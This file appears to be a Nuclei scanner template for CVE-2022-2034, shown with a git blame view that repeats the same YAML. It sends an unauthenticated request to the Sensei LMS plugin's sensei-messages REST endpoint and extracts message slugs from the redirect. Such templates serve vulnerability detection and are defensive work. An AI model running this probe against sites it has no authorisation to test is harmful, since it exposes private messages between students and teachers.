nuclei-templates/cves/2022/CVE-2022-2034.yaml

id: CVE-2022-2034

info:
  name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
  author: imhunterand
  severity: medium
  description: |
    The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
  reference:
    - https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
    - https://hackerone.com/reports/1590237
    - https://wordpress.org/plugins/sensei-lms/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2034
  classification:
    cve-id: CVE-2022-2034
  tags: cve,cve2022,wordpress,wp-plugin,wp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)Location: http(s|):\/\/[\w\.\-]+\/sensei-messages\/\w+'

      - type: status
        status:
          - 301

    extractors:
      - type: regex
        part: header
        regex:
          - 'sensei-messages\/\w+'
Update and rename vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml to cves/2022/CVE-2022-2034.yaml 2022-08-30 15:59:02 +00:00			`id: CVE-2022-2034`

			`info:`
			`name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure`
			`author: imhunterand`
			`severity: medium`
			`description: \|`
			`The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers`
			`reference:`
			`- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426`
Update CVE-2022-2034.yaml 2022-11-30 08:50:37 +00:00			`- https://hackerone.com/reports/1590237`
			`- https://wordpress.org/plugins/sensei-lms/advanced/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-2034`
Update and rename vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml to cves/2022/CVE-2022-2034.yaml 2022-08-30 15:59:02 +00:00			`classification:`
			`cve-id: CVE-2022-2034`
			`tags: cve,cve2022,wordpress,wp-plugin,wp`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: header`
			`regex:`
			`- '(?i)Location: http(s\|):\/\/[\w\.\-]+\/sensei-messages\/\w+'`

			`- type: status`
			`status:`
			`- 301`

			`extractors:`
			`- type: regex`
			`part: header`
			`regex:`
			`- 'sensei-messages\/\w+'`